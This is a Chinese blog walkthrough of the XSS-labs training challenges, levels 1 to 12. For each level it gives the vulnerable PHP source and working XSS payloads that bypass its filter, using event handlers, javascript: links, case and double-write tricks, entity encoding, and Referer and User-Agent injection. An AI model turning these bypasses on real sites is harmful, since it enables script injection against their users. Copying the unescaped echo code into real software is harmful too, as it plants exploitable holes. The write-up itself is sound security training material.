<!DOCTYPE html>
<html lang="zh-CN">
<head>
    <meta charset="utf-8">
    <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
    <meta name="keywords" content="Hexo Theme Keep">
    <meta name="description" content="Hexo Theme Keep">
    <meta name="author" content="n3ym4r">
    
    <title>
        
            XSS-labs通关笔记 |
        
        n3ym4r&#39;s blog
    </title>
    
<link rel="stylesheet" href="/css/style.css">

    <link rel="shortcut icon" href="/images/logo.svg">
    <link rel="stylesheet" href="//cdn.jsdelivr.net/npm/hexo-theme-keep@3.4.9/source/fontawesome/css/fontawesome.min.css">
    <link rel="stylesheet" href="//cdn.jsdelivr.net/npm/hexo-theme-keep@3.4.9/source/fontawesome/css/regular.min.css">
    <link rel="stylesheet" href="//cdn.jsdelivr.net/npm/hexo-theme-keep@3.4.9/source/fontawesome/css/solid.min.css">
    <link rel="stylesheet" href="//cdn.jsdelivr.net/npm/hexo-theme-keep@3.4.9/source/fontawesome/css/brands.min.css">
    <script id="hexo-configurations">
    let KEEP = window.KEEP || {};
    KEEP.hexo_config = {"hostname":"example.com","root":"/","language":"zh-CN","path":"search.json"};
    KEEP.theme_config = {"toc":{"enable":true,"number":false,"expand_all":false,"init_open":true},"style":{"primary_color":"#5ed5cc","logo":"/images/logo.svg","favicon":"/images/logo.svg","avatar":"/images/logo.svg","font_size":null,"font_family":null,"left_side_width":"260px","content_max_width":"920px","hover":{"shadow":true,"scale":true},"first_screen":{"enable":true,"header_transparent":false,"background_img":"/images/bg.svg","description":"Pay attention to safety!","font_color":null,"hitokoto":{"enable":true}},"scroll":{"progress_bar":{"enable":false},"percent":{"enable":true}}},"local_search":{"enable":true,"preload":true},"code_copy":{},"code_block_tools":{"enable":true,"style":"default"},"side_tools":{},"pjax":{"enable":true},"lazyload":{"enable":false},"version":"3.4.9"};
    KEEP.language_ago = {"second":"%s 秒前","minute":"%s 分钟前","hour":"%s 小时前","day":"%s 天前","week":"%s 周前","month":"%s 个月前","year":"%s 年前"};
    KEEP.language_code_block = {"copy":"复制代码","copied":"已复制","fold":"折叠代码块","folded":"已折叠"};
  </script>
<meta name="generator" content="Hexo 6.3.0"></head>


<body>
<div class="progress-bar-container">
    

    
        <span class="pjax-progress-bar"></span>
        <i class="pjax-progress-icon fas fa-circle-notch fa-spin"></i>
    
</div>


<main class="page-container">

    

    <div class="page-main-content">

        <div class="page-main-content-top">
            
<header class="header-wrapper">

    <div class="header-content">
        <div class="left">
            
                <a class="logo-image" href="/">
                    <img src="/images/logo.svg">
                </a>
            
            <a class="logo-title" href="/">
               n3ym4r&#39;s blog
            </a>
        </div>

        <div class="right">
            <div class="pc">
                <ul class="menu-list">
                    
                        <li class="menu-item">
                            <a class=""
                               href="/"
                            >
                                首页
                            </a>
                        </li>
                    
                        <li class="menu-item">
                            <a class=""
                               href="/archives"
                            >
                                归档
                            </a>
                        </li>
                    
                        <li class="menu-item">
                            <a class=""
                               href="/tags"
                            >
                                标签
                            </a>
                        </li>
                    
                        <li class="menu-item">
                            <a class=""
                               href="/links"
                            >
                                友链
                            </a>
                        </li>
                    
                        <li class="menu-item">
                            <a class=""
                               href="/about"
                            >
                                关于
                            </a>
                        </li>
                    
                    
                        <li class="menu-item search search-popup-trigger">
                            <i class="fas fa-search"></i>
                        </li>
                    
                </ul>
            </div>
            <div class="mobile">
                
                    <div class="icon-item search search-popup-trigger"><i class="fas fa-search"></i></div>
                
                <div class="icon-item menu-bar">
                    <div class="menu-bar-middle"></div>
                </div>
            </div>
        </div>
    </div>

    <div class="header-drawer">
        <ul class="drawer-menu-list">
            
                <li class="drawer-menu-item flex-center">
                    <a class=""
                       href="/">首页</a>
                </li>
            
                <li class="drawer-menu-item flex-center">
                    <a class=""
                       href="/archives">归档</a>
                </li>
            
                <li class="drawer-menu-item flex-center">
                    <a class=""
                       href="/tags">标签</a>
                </li>
            
                <li class="drawer-menu-item flex-center">
                    <a class=""
                       href="/links">友链</a>
                </li>
            
                <li class="drawer-menu-item flex-center">
                    <a class=""
                       href="/about">关于</a>
                </li>
            
        </ul>
    </div>

    <div class="window-mask"></div>

</header>


        </div>

        <div class="page-main-content-middle">

            <div class="main-content">

                
                    <div class="fade-in-down-animation">
    <div class="article-content-container">

        <div class="article-title">
            <span class="title-hover-animation">XSS-labs通关笔记</span>
        </div>

        
            <div class="article-header">
                <div class="avatar">
                    <img src="/images/logo.svg">
                </div>
                <div class="info">
                    <div class="author">
                        <span class="name">n3ym4r</span>
                        
                    </div>
                    <div class="meta-info">
                        
<div class="article-meta-info">
    <span class="article-date article-meta-item">
        
            <i class="fa-regular fa-calendar-plus"></i>&nbsp;
        
        <span class="pc">2020-04-07 21:55:14</span>
        <span class="mobile">2020-04-07 21:55</span>
    </span>
    
        <span class="article-update-date article-meta-item">
        <i class="fas fa-file-pen"></i>&nbsp;
        <span class="pc">2022-10-16 20:08:32</span>
    </span>
    
    
        <span class="article-categories article-meta-item">
            <i class="fas fa-folder"></i>&nbsp;
            <ul>
                
                    <li>
                        <a href="/categories/%E7%AC%94%E8%AE%B0/">笔记</a>&nbsp;
                    </li>
                
            </ul>
        </span>
    
    
        <span class="article-tags article-meta-item">
            <i class="fas fa-tags"></i>&nbsp;
            <ul>
                
                    <li>
                        <a href="/tags/%E7%AC%94%E8%AE%B0/">笔记</a>&nbsp;
                    </li>
                
            </ul>
        </span>
    

    
    
        <span class="article-wordcount article-meta-item">
            <i class="fas fa-file-word"></i>&nbsp;<span>4.3k 字</span>
        </span>
    
    
        <span class="article-min2read article-meta-item">
            <i class="fas fa-clock"></i>&nbsp;<span>20 分钟</span>
        </span>
    
    
</div>

                    </div>
                </div>
            </div>
        

        <div class="article-content markdown-body">
            <h1 id="XSS-labs通关笔记"><a href="#XSS-labs通关笔记" class="headerlink" title="XSS-labs通关笔记"></a>XSS-labs通关笔记</h1><h2 id="level-1"><a href="#level-1" class="headerlink" title="level 1"></a>level 1</h2><p><img src="https://cdn.staticaly.com/gh/n3ym4r/image@master/20221016/image.46f551gs9x80.webp"></p>
<p>我们可以看到这里将name的参数值，插入到了<h2> </h2>中，这里就是反射型xss，直接给name重新赋值。</p>
<p><img src="https://cdn.staticaly.com/gh/n3ym4r/image@master/20221016/image.1wojnmrup40w.webp"></p>
<p>服务器并没有进行任何的过滤，我们可以看看服务器端</p>
<h4 id="服务器端源代码"><a href="#服务器端源代码" class="headerlink" title="服务器端源代码"></a>服务器端源代码</h4><p><code>&lt;/script&gt;</code></p>
<p><code>&lt;title&gt;欢迎来到level1&lt;/title&gt;</code></p>
<p><code>&lt;/head&gt;</code></p>
<p><code>&lt;body&gt;</code></p>
<p><code>&lt;h1 align=center&gt;欢迎来到level1&lt;/h1&gt;</code></p>
<p><code>&lt;?php</code> </p>
<p><code>ini_set(&quot;display_errors&quot;, 0);</code></p>
<p><code>$str = $_GET[&quot;name&quot;];</code>                                                         <strong>&#x2F;&#x2F;这里将name赋值给了str</strong></p>
<p><code>echo &quot;&lt;h2 align=center&gt;欢迎用户&quot;.$str.&quot;&lt;/h2&gt;&quot;;</code>       <strong>&#x2F;&#x2F;这里直接将str插入了标签之间,导致反射型xss形成</strong></p>
<p>**<code>?&gt;**</code></p>
<p><code>&lt;center&gt;&lt;img src=level1.png&gt;&lt;/center&gt;</code></p>
<p><code>&lt;?php</code> </p>
<p><code>echo &quot;&lt;h3 align=center&gt;payload的长度:&quot;.strlen($str).&quot;&lt;/h3&gt;&quot;;</code></p>
<p><code>?&gt;</code></p>
<p><code>&lt;/body&gt;</code></p>
<p><code>&lt;/html&gt;</code></p>
<h2 id="level-2"><a href="#level-2" class="headerlink" title="level 2"></a>level 2</h2><p><img src="https://cdn.staticaly.com/gh/n3ym4r/image@master/20221016/image.2ilca4prtjs0.webp"></p>
<p>可以发现，通过get传参提交，经过服务器的动态处理之后又会将参数keyword的值插入到<code>&lt;h2&gt; &lt;/h2&gt;</code>标签之中以及</p>
<p>添加到<code>&lt;input&gt;</code>标签中的value属性的值内。</p>
<p>我们尝试用上关的payload提交</p>
<p><img src="https://cdn.staticaly.com/gh/n3ym4r/image@master/20221016/image.1t99oq6bkosg.webp"></p>
<p>可以看到，在<code>&lt;h2&gt; &lt;/h2&gt;</code>标签之中的恶意代码被编码了，其中<code>&lt;</code>和<code>&gt;</code>都被编码成了html字符实体，猜测在服务器端用<code>htmlspecialchars()函数</code>对keyword参数的值进行了处理，接着往下看可以看到插入到value参数值中的恶意代码并没有被编码而是直接原样返回，但是问题是这里的js代码在标签属性值中，浏览器是无法执行的，既然上面的恶意代码被编码了，那么只能从属性值中的恶意代码处进行突破了。</p>
<p>要想浏览器执行这里的弹窗代码，只需要<strong>将属性的引号和标签先闭合</strong>就可以了</p>
<p>用”&gt;闭合前面的&lt;input，再用&#x2F;&#x2F;将后面的”注释掉。</p>
<p><strong>payload：</strong><code>n3ym4r&quot;&gt;&lt;script&gt;alert(&#39;xss&#39;)&lt;/script&gt;//</code></p>
<h4 id="服务器端源代码-1"><a href="#服务器端源代码-1" class="headerlink" title="服务器端源代码"></a>服务器端源代码</h4><p><code>&lt;?php</code> </p>
<p><code>ini_set(&quot;display_errors&quot;, 0);</code></p>
<p><code>$str = $_GET[&quot;keyword&quot;];</code><strong>&#x2F;&#x2F;将get方式传递到服务器端的keyword参数的值赋给str变量</strong></p>
<p><code>echo &quot;&lt;h2 align=center&gt;没有找到和&quot;.htmlspecialchars($str).&quot;相关的结果.&lt;/h2&gt;&quot;.&#39;&lt;center&gt;</code></p>
<p> <strong>&#x2F;&#x2F;用<code>htmlspecialchars()函数</code>对变量str进行处理之后显示到网页上</strong></p>
<p><code>&lt;form action=level2.php method=GET&gt;</code></p>
<p><code>&lt;input name=keyword  value=&quot;&#39;.$str.&#39;&quot;&gt;</code><strong>&#x2F;&#x2F;直接将变量值插入到了<code>&lt;input&gt;</code>标签的value属性值中</strong></p>
<p><code>&lt;input type=submit name=submit value=&quot;搜索&quot;/&gt;</code></p>
<p><code>&lt;/form&gt;</code></p>
<p><code>&lt;/center&gt;&#39;;</code></p>
<p><code>?&gt;</code></p>
<p><code>&lt;center&gt;&lt;img src=level2.png&gt;&lt;/center&gt;</code></p>
<p><code>&lt;?php</code> </p>
<p><code>echo &quot;&lt;h3 align=center&gt;payload的长度:&quot;.strlen($str).&quot;&lt;/h3&gt;&quot;;</code></p>
<p><code>?&gt;</code></p>
<h2 id="level-3"><a href="#level-3" class="headerlink" title="level 3"></a>level 3</h2><p>简单测试，发现与第二关相比，这里将属性值这里也进行了<code>htmlspecialchars()</code>函数处理。</p>
<p><img src="https://cdn.staticaly.com/gh/n3ym4r/image@master/20221016/image.3x8axmk2pv20.webp"></p>
<p>这里，无法使用标签，因为标签都是带有&lt;&gt;符号的，就会被转义。但该函数不会转义单引号，可以采用<strong>事件</strong>闭合标签。</p>
<h4 id="payload"><a href="#payload" class="headerlink" title="payload"></a>payload</h4><p> <code>&#39; onclick=&#39;alert(1)</code>&#x2F;&#x2F;当单击鼠标时运行脚本</p>
<p><code>&#39; onmouseover=&#39;alert(1)</code>&#x2F;&#x2F;当鼠标指针移至元素之上时运行脚本</p>
<h4 id="源代码"><a href="#源代码" class="headerlink" title="源代码"></a>源代码</h4><p><code>&lt;?php</code> </p>
<p><code>ini_set(&quot;display_errors&quot;, 0);</code></p>
<p><code>$str = $_GET[&quot;keyword&quot;];</code></p>
<p><code>echo &quot;&lt;h2 align=center&gt;没有找到和&quot;.htmlspecialchars($str).&quot;相关的结果.&lt;/h2&gt;&quot;.&quot;&lt;center&gt;</code></p>
<p><code>&lt;form action=level3.php method=GET&gt;</code></p>
<p><code>&lt;input name=keyword  value=&#39;&quot;.htmlspecialchars($str).&quot;&#39;&gt;</code>   </p>
<p><code>&lt;input type=submit name=submit value=搜索 /&gt;</code></p>
<p><code>&lt;/form&gt;</code></p>
<p><code>&lt;/center&gt;&quot;;</code></p>
<p><code>?&gt;</code></p>
<h4 id="htmlspecialchars"><a href="#htmlspecialchars" class="headerlink" title="htmlspecialchars ()"></a>htmlspecialchars ()</h4><p>将特殊字符转换为html实体</p>
<h2 id="level-4"><a href="#level-4" class="headerlink" title="level 4"></a>level 4</h2><p><img src="https://cdn.staticaly.com/gh/n3ym4r/image@master/20221016/image.2ltfhjxz3ji0.webp"></p>
<p>可以看到&lt;&gt;符号被替换成了空</p>
<p>但是事件不需要用到&lt;&gt;，所以直接用<strong>鼠标事件</strong>插入</p>
<h4 id="payload-1"><a href="#payload-1" class="headerlink" title="payload"></a>payload</h4><p><code>&quot; onmouseover=&quot;alert(/xss/)</code></p>
<p>我们还是同样需要闭合他原来的语句。</p>
<h4 id="源代码-1"><a href="#源代码-1" class="headerlink" title="源代码"></a>源代码</h4><p><code>&lt;?php</code> </p>
<p><code>ini_set(&quot;display_errors&quot;, 0);</code></p>
<p><code>$str = $_GET[&quot;keyword&quot;];</code></p>
<p><code>$str2=str_replace(&quot;&gt;&quot;,&quot;&quot;,$str);</code> </p>
<p><code>$str3=str_replace(&quot;&lt;&quot;,&quot;&quot;,$str2);</code><strong>&#x2F;&#x2F;将&lt;&gt;替换为空</strong></p>
<p><code>echo &quot;&lt;h2 align=center&gt;没有找到和&quot;.htmlspecialchars($str).&quot;相关的结果.&lt;/h2&gt;&quot;.&#39;&lt;center&gt;</code></p>
<p><code>&lt;form action=level4.php method=GET&gt;</code></p>
<p><code>&lt;input name=keyword  value=&quot;&#39;.$str3.&#39;&quot;&gt;</code></p>
<p><code>&lt;input type=submit name=submit value=搜索 /&gt;</code></p>
<p><code>&lt;/form&gt;</code></p>
<p><code>&lt;/center&gt;&#39;;</code></p>
<p><code>?&gt;</code></p>
<h2 id="level-5"><a href="#level-5" class="headerlink" title="level 5"></a>level 5</h2><h4 id="源代码-2"><a href="#源代码-2" class="headerlink" title="源代码"></a>源代码</h4><p><code>&lt;?php</code> </p>
<p><code>ini_set(&quot;display_errors&quot;, 0);</code></p>
<p><code>$str = strtolower($_GET[&quot;keyword&quot;]);</code></p>
<p><code>$str2=str_replace(&quot;&lt;script&quot;,&quot;&lt;scr_ipt&quot;,$str);</code></p>
<p><code>$str3=str_replace(&quot;on&quot;,&quot;o_n&quot;,$str2);</code></p>
<p><code>echo &quot;&lt;h2 align=center&gt;没有找到和&quot;.htmlspecialchars($str).&quot;相关的结果.&lt;/h2&gt;&quot;.&#39;&lt;center&gt;</code></p>
<p><code>&lt;form action=level5.php method=GET&gt;</code></p>
<p><code>&lt;input name=keyword  value=&quot;&#39;.$str3.&#39;&quot;&gt;</code></p>
<p><code>&lt;input type=submit name=submit value=搜索 /&gt;</code></p>
<p><code>&lt;/form&gt;</code></p>
<p><code>&lt;/center&gt;&#39;;</code></p>
<p><code>?&gt;</code></p>
<p>可以看到将&lt;script替换为了&lt;scr_ipt,同时也将on替换为了o_n,这使得我们无法通过<code>&lt;script&gt;</code>标签或触发事件来执行js代码，那么我们可以换个标签，使用<strong>a标签的js伪协议实现href属性</strong>支持javascript:伪协议构造poc 产生一个链接</p>
<h4 id="payload-2"><a href="#payload-2" class="headerlink" title="payload"></a>payload</h4><p><strong><code>&quot;&gt; &lt;a href=javascript:alert(&#39;xss&#39;) &gt; xss&lt;/a&gt; //</code></strong></p>
<h2 id="level-6"><a href="#level-6" class="headerlink" title="level 6"></a>level 6</h2><h4 id="源代码-3"><a href="#源代码-3" class="headerlink" title="源代码"></a>源代码</h4><p><code>&lt;?php</code> </p>
<p><code>ini_set(&quot;display_errors&quot;, 0);</code></p>
<p><code>$str = $_GET[&quot;keyword&quot;];</code></p>
<p><code>$str2=str_replace(&quot;&lt;script&quot;,&quot;&lt;scr_ipt&quot;,$str);</code><strong>&#x2F;&#x2F;限制&lt;script恶意代码</strong></p>
<p><code>$str3=str_replace(&quot;on&quot;,&quot;o_n&quot;,$str2);</code><strong>&#x2F;&#x2F;限制带on的事件</strong></p>
<p><code>$str4=str_replace(&quot;src&quot;,&quot;sr_c&quot;,$str3);</code><strong>&#x2F;&#x2F;限制图片<img>标签，&lt;img src&#x3D;111 onerror&#x3D;alert(‘xss’)&gt;</strong></p>
<p><code>$str5=str_replace(&quot;data&quot;,&quot;da_ta&quot;,$str4);</code><strong>&#x2F;&#x2F;data:对字符编码的一种设定</strong></p>
<p><code>$str6=str_replace(&quot;href&quot;,&quot;hr_ef&quot;,$str5);</code><strong>&#x2F;&#x2F;限制通过在href属性中插入js代码来点击执行</strong></p>
<p><code>echo &quot;&lt;h2 align=center&gt;没有找到和&quot;.htmlspecialchars($str).&quot;相关的结果.&lt;/h2&gt;&quot;.&#39;&lt;center&gt;</code></p>
<p><code>&lt;form action=level6.php method=GET&gt;</code></p>
<p><code>&lt;input name=keyword  value=&quot;&#39;.$str6.&#39;&quot;&gt;</code></p>
<p><code>&lt;input type=submit name=submit value=搜索 /&gt;</code></p>
<p><code>&lt;/form&gt;</code></p>
<p><code>&lt;/center&gt;&#39;;</code></p>
<p><code>?&gt;</code></p>
<p>可以看到做了很多限制，但是都是判断的整个字符，我们可以<strong>大小写绕过</strong></p>
<h4 id="payload-3"><a href="#payload-3" class="headerlink" title="payload"></a>payload</h4><p><code>&quot;&gt;&lt;sCrIpt&gt;alert(/xss/)&lt;/ScRipt&gt;</code></p>
<h2 id="level-7"><a href="#level-7" class="headerlink" title="level 7"></a>level 7</h2><h4 id="源代码-4"><a href="#源代码-4" class="headerlink" title="源代码"></a>源代码</h4><p><code>&lt;?php</code> </p>
<p><code>ini_set(&quot;display_errors&quot;, 0);</code></p>
<p><code>$str =strtolower( $_GET[&quot;keyword&quot;]);</code></p>
<p><code>$str2=str_replace(&quot;script&quot;,&quot;&quot;,$str);</code><strong>&#x2F;&#x2F;将script替换为空，以下同理</strong></p>
<p><code>$str3=str_replace(&quot;on&quot;,&quot;&quot;,$str2);</code></p>
<p><code>$str4=str_replace(&quot;src&quot;,&quot;&quot;,$str3);</code></p>
<p><code>$str5=str_replace(&quot;data&quot;,&quot;&quot;,$str4);</code></p>
<p><code>$str6=str_replace(&quot;href&quot;,&quot;&quot;,$str5);</code></p>
<p><code>echo &quot;&lt;h2 align=center&gt;没有找到和&quot;.htmlspecialchars($str).&quot;相关的结果.&lt;/h2&gt;&quot;.&#39;&lt;center&gt;</code></p>
<p><code>&lt;form action=level7.php method=GET&gt;</code></p>
<p><code>&lt;input name=keyword  value=&quot;&#39;.$str6.&#39;&quot;&gt;</code></p>
<p><code>&lt;input type=submit name=submit value=搜索 /&gt;</code></p>
<p><code>&lt;/form&gt;</code></p>
<p><code>&lt;/center&gt;&#39;;</code></p>
<p><code>?&gt;</code></p>
<p>因为只会对整个字符串进行一次替换，所以我们可以使用<strong>双写绕过</strong></p>
<h4 id="payload-4"><a href="#payload-4" class="headerlink" title="payload"></a>payload</h4><p><code>&quot;&gt;&lt;scscriptript&gt;alert(1)&lt;/scrscriptipt&gt;</code></p>
<h2 id="level-8"><a href="#level-8" class="headerlink" title="level 8"></a>level 8</h2><h4 id="源代码-5"><a href="#源代码-5" class="headerlink" title="源代码"></a>源代码</h4><p><code>&lt;?php</code> </p>
<p><code>ini_set(&quot;display_errors&quot;, 0);</code></p>
<p><code>$str = strtolower($_GET[&quot;keyword&quot;]);</code></p>
<p><code>$str2=str_replace(&quot;script&quot;,&quot;scr_ipt&quot;,$str);</code></p>
<p><code>$str3=str_replace(&quot;on&quot;,&quot;o_n&quot;,$str2);</code></p>
<p><code>$str4=str_replace(&quot;src&quot;,&quot;sr_c&quot;,$str3);</code></p>
<p><code>$str5=str_replace(&quot;data&quot;,&quot;da_ta&quot;,$str4);</code></p>
<p><code>$str6=str_replace(&quot;href&quot;,&quot;hr_ef&quot;,$str5);</code></p>
<p><code>$str7=str_replace(&#39;&quot;&#39;,&#39;&amp;quot&#39;,$str6);</code></p>
<p><code>echo &#39;&lt;center&gt;</code></p>
<p><code>&lt;form action=level8.php method=GET&gt;</code></p>
<p><code>&lt;input name=keyword  value=&quot;&#39;.htmlspecialchars($str).&#39;&quot;&gt;</code></p>
<p><code>&lt;input type=submit name=submit value=添加友情链接 /&gt;</code></p>
<p><code>&lt;/form&gt;</code></p>
<p><code>&lt;/center&gt;&#39;;</code></p>
<p><code>?&gt;</code></p>
<p><code>&lt;?php</code></p>
<p> <code>echo &#39;&lt;center&gt;&lt;BR&gt;&lt;a href=&quot;&#39;.$str7.&#39;&quot;&gt;友情链接&lt;/a&gt;&lt;/center&gt;&#39;;</code> <strong>&#x2F;&#x2F;在这里进行拼接</strong></p>
<p><code>?&gt;</code></p>
<p><code>&lt;center&gt;&lt;img src=level8.jpg&gt;&lt;/center&gt;</code></p>
<p><code>&lt;?php</code> </p>
<p><code>echo &quot;&lt;h3 align=center&gt;payload的长度:&quot;.strlen($str7).&quot;&lt;/h3&gt;&quot;;</code></p>
<p><code>?&gt;</code></p>
<p>可以看到将大部分能用到的字符都做了破坏，看到友情链接那里，我们可以使用编码的方式绕过</p>
<p><img src="https://cdn.staticaly.com/gh/n3ym4r/image@master/20221016/image.6ujrb8i860c0.webp"></p>
<h4 id="payload-5"><a href="#payload-5" class="headerlink" title="payload"></a>payload</h4><p><code>&amp;#106;&amp;#97;&amp;#118;&amp;#97;&amp;#115;&amp;#99;&amp;#114;&amp;#105;&amp;#112;&amp;#116;&amp;#58;&amp;#97;&amp;#108;&amp;#101;&amp;#114;&amp;#116;&amp;#40;&amp;#39;&amp;#120;&amp;#115;&amp;#115;&amp;#39;&amp;#41;</code></p>
<h2 id="level-9"><a href="#level-9" class="headerlink" title="level 9"></a>level 9</h2><h4 id="源代码-6"><a href="#源代码-6" class="headerlink" title="源代码"></a>源代码</h4><pre><code>&lt;?php 

ini_set(&quot;display_errors&quot;, 0);

$str = strtolower($_GET[&quot;keyword&quot;]);

$str2=str_replace(&quot;script&quot;,&quot;scr_ipt&quot;,$str);

$str3=str_replace(&quot;on&quot;,&quot;o_n&quot;,$str2);

$str4=str_replace(&quot;src&quot;,&quot;sr_c&quot;,$str3);

$str5=str_replace(&quot;data&quot;,&quot;da_ta&quot;,$str4);

$str6=str_replace(&quot;href&quot;,&quot;hr_ef&quot;,$str5);

$str7=str_replace(&#39;&quot;&#39;,&#39;&amp;quot&#39;,$str6);

echo &#39;&lt;center&gt;

&lt;form action=level9.php method=GET&gt;

&lt;input name=keyword  value=&quot;&#39;.htmlspecialchars($str).&#39;&quot;&gt;

&lt;input type=submit name=submit value=添加友情链接 /&gt;

&lt;/form&gt;

&lt;/center&gt;&#39;;

?&gt;

&lt;?php

if(false===strpos($str7,&#39;http://&#39;))  

&#123;

 echo &#39;&lt;center&gt;&lt;BR&gt;&lt;a href=&quot;您的链接不合法？有没有！&quot;&gt;友情链接&lt;/a&gt;&lt;/center&gt;&#39;;

   &#125;

else

&#123;

 echo &#39;&lt;center&gt;&lt;BR&gt;&lt;a href=&quot;&#39;.$str7.&#39;&quot;&gt;友情链接&lt;/a&gt;&lt;/center&gt;&#39;;

&#125;

?&gt;

&lt;center&gt;&lt;img src=level9.png&gt;&lt;/center&gt;

&lt;?php 

echo &quot;&lt;h3 align=center&gt;payload的长度:&quot;.strlen($str7).&quot;&lt;/h3&gt;&quot;;

?&gt;
</code></pre>
<p>if(false&#x3D;&#x3D;&#x3D;strpos($str7,’http:&#x2F;&#x2F;‘))  判断是否包含http:&#x2F;&#x2F;然后返回,这里还是可以通过编码来绕过</p>
<h4 id="payload-6"><a href="#payload-6" class="headerlink" title="payload"></a>payload</h4><p><code>&amp;#106;&amp;#97;&amp;#118;&amp;#97;&amp;#115;&amp;#99;&amp;#114;&amp;#105;&amp;#112;&amp;#116;&amp;#58;&amp;#97;&amp;#108;&amp;#101;&amp;#114;&amp;#116;&amp;#40;&amp;#49;&amp;#41;//http://</code></p>
<h2 id="level-10"><a href="#level-10" class="headerlink" title="level 10"></a>level 10</h2><p><img src="https://cdn.staticaly.com/gh/n3ym4r/image@master/20221016/image.6s63f3ojisg0.webp"></p>
<p>可以看到有三个input标签，我们得测试出哪个表单可以突破</p>
<p>构造语句：<code>?keyword=&lt;script&gt;alert(&#39;xss&#39;)&lt;/script&gt;&amp;t_link=&quot; type=&quot;text&quot;&amp;t_history=&quot; type=&quot;text&quot;&amp;t_sort=&quot; type=&quot;text&quot;</code></p>
<p><img src="https://cdn.staticaly.com/gh/n3ym4r/image@master/20221016/image.6ap3ukt49a80.webp"></p>
<p>t_sort时，出现一个输入框，所以我们可以确定了</p>
<h4 id="payload-7"><a href="#payload-7" class="headerlink" title="payload"></a>payload</h4><p><code>?keyword=&lt;script&gt;alert(&#39;xss&#39;)&lt;/script&gt;&amp;t_sort=&quot; type=&quot;text&quot; onclick=&quot;alert(&#39;xss&#39;)</code></p>
<h4 id="源代码-7"><a href="#源代码-7" class="headerlink" title="源代码"></a>源代码</h4><p>我们可以再看看源代码</p>
<p><code>&lt;?php</code> </p>
<p><code>ini_set(&quot;display_errors&quot;, 0);</code></p>
<p><code>$str = $_GET[&quot;keyword&quot;];</code></p>
<p><code>$str11 = $_GET[&quot;t_sort&quot;];</code></p>
<p><code>$str22=str_replace(&quot;&gt;&quot;,&quot;&quot;,$str11);</code></p>
<p><code>$str33=str_replace(&quot;&lt;&quot;,&quot;&quot;,$str22);</code></p>
<p><code>echo &quot;&lt;h2 align=center&gt;没有找到和&quot;.htmlspecialchars($str).&quot;相关的结果.&lt;/h2&gt;&quot;.&#39;&lt;center&gt;</code></p>
<p><code>&lt;form id=search&gt;</code></p>
<p><code>&lt;input name=&quot;t_link&quot;  value=&quot;&#39;.&#39;&quot; type=&quot;hidden&quot;&gt;</code></p>
<p><code>&lt;input name=&quot;t_history&quot;  value=&quot;&#39;.&#39;&quot; type=&quot;hidden&quot;&gt;</code></p>
<p><code>&lt;input name=&quot;t_sort&quot;  value=&quot;&#39;.$str33.&#39;&quot; type=&quot;hidden&quot;&gt;</code></p>
<p><code>&lt;/form&gt;</code></p>
<p><code>&lt;/center&gt;&#39;;</code></p>
<p><code>?&gt;</code></p>
<p>可以看到，我们的猜测没错,值得注意的是，这里会将&lt;&gt;替换为空，不能通过闭合input，引入新的标签来触发，只能通过事件来触发。</p>
<h2 id="level-11"><a href="#level-11" class="headerlink" title="level 11"></a>level 11</h2><h4 id="源代码-8"><a href="#源代码-8" class="headerlink" title="源代码"></a>源代码</h4><p><code>&lt;?php</code> </p>
<p><code>ini_set(&quot;display_errors&quot;, 0);</code></p>
<p><code>$str = $_GET[&quot;keyword&quot;];</code></p>
<p><code>$str00 = $_GET[&quot;t_sort&quot;];</code></p>
<p><code>$str11=$_SERVER[&#39;HTTP_REFERER&#39;];</code></p>
<p><code>$str22=str_replace(&quot;&gt;&quot;,&quot;&quot;,$str11);</code></p>
<p><code>$str33=str_replace(&quot;&lt;&quot;,&quot;&quot;,$str22);</code></p>
<p><code>echo &quot;&lt;h2 align=center&gt;没有找到和&quot;.htmlspecialchars($str).&quot;相关的结果.&lt;/h2&gt;&quot;.&#39;&lt;center&gt;</code></p>
<p><code>&lt;form id=search&gt;</code></p>
<p><code>&lt;input name=&quot;t_link&quot;  value=&quot;&#39;.&#39;&quot; type=&quot;hidden&quot;&gt;</code></p>
<p><code>&lt;input name=&quot;t_history&quot;  value=&quot;&#39;.&#39;&quot; type=&quot;hidden&quot;&gt;</code></p>
<p><code>&lt;input name=&quot;t_sort&quot;  value=&quot;&#39;.htmlspecialchars($str00).&#39;&quot; type=&quot;hidden&quot;&gt;</code></p>
<p><code>&lt;input name=&quot;t_ref&quot;  value=&quot;&#39;.$str33.&#39;&quot; type=&quot;hidden&quot;&gt;</code></p>
<p><code>&lt;/form&gt;</code></p>
<p><code>&lt;/center&gt;&#39;;</code></p>
<p><code>?&gt;</code></p>
<p>这一关卡和上面的一关非常的像多了一个input表单的信息，在服务器端还将请求头中的referer头的值赋给了str11这个变量，$_SERVER[‘HTTP_REFERER’]  #链接到当前页面的前一页面的 URL 地址，也就是说这里可以做点文章。在将变量值中的&lt;和&gt;删除之后就会插入到t_ref这个标签的<strong>value</strong>属性值中。而上一关的t_sort标签虽然也能接收并显示参数值，但是这个参数值是要用htmlspecialchars()函数处理的。</p>
<p>这里，我们就可以抓包，将数据包中的referer改为我们的恶意代码</p>
<p><img src="https://cdn.staticaly.com/gh/n3ym4r/image@master/20221016/image.471sf6vo8xi0.webp"></p>
<h4 id="payload-8"><a href="#payload-8" class="headerlink" title="payload"></a>payload</h4><p><code>referer:&quot;type=&quot;text&quot; onclick=&quot;alert(&#39;xss&#39;)</code></p>
<h2 id="level-12"><a href="#level-12" class="headerlink" title="level 12"></a>level 12</h2><p><img src="https://cdn.staticaly.com/gh/n3ym4r/image@master/20221016/image.2dy1tugsqe3o.webp"></p>
<p>查看网页源码，我们发现，有一个和ua头一样的参数值，我们可以大胆猜测，这关测试点就在ua头，抓包改包试试</p>
<p><img src="https://cdn.staticaly.com/gh/n3ym4r/image@master/20221016/image.qomq2l6d1io.webp"></p>
<p>成功</p>
<h4 id="payload-9"><a href="#payload-9" class="headerlink" title="payload"></a>payload</h4><p><code>User-Agent: &quot;type=&quot;text&quot; onclick=&quot;alert(&#39;xss&#39;)</code></p>
<h4 id="源代码-9"><a href="#源代码-9" class="headerlink" title="源代码"></a>源代码</h4><p><code>&lt;?php</code> </p>
<p><code>ini_set(&quot;display_errors&quot;, 0);</code></p>
<p><code>$str = $_GET[&quot;keyword&quot;];</code></p>
<p><code>$str00 = $_GET[&quot;t_sort&quot;];</code></p>
<p><code>$str11=$_SERVER[&#39;HTTP_USER_AGENT&#39;];</code></p>
<p><code>$str22=str_replace(&quot;&gt;&quot;,&quot;&quot;,$str11);</code></p>
<p><code>$str33=str_replace(&quot;&lt;&quot;,&quot;&quot;,$str22);</code></p>
